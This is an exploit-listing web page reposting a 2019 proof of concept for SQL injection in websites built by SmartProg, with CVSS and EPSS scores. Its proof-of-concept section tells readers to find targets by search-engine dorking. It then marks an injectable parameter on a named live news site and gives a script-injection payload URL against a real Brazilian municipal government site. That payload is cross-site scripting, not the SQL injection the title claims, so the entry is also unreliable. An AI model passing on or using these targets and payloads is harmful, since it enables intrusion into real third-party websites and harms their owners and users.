Advertisement






Developpé par SmartProg Sql injection Vulnerability

CVE Category Price Severity
CWE-89 Not specified High
Author Risk Exploitation Type Date
smartprog High Remote 2019-08-19
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019080072

Below is a copy:

Developp par SmartProg Sql injection Vulnerability
======================================================================================================================================
| # Title     : Developp par SmartProg Sql injection Vulnerability                                                                  |
| # Author    : indoushka                                                                                                            |
| # Tested on : windows 10 Franais V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                               | 
| # Vendor    : http://smartprog.ma/                                                                                                 |  
| # Dork      :                                                                                                                      |
======================================================================================================================================

poc :


[+] Dorking n Google Or Other Search Enggine.

[+] Use payload : http://www.kafapress.ma/impression.php?ida=81827 <======| inject here

[+] http://www.saogabriel.rs.gov.br/Portal/busca/resultados.html?txt-busca=1%3Cscript%3Ealert(/indoushka/);%3C/script%3E&yt0=submit


Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        
                                                                                                                                      |
=======================================================================================================================================

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.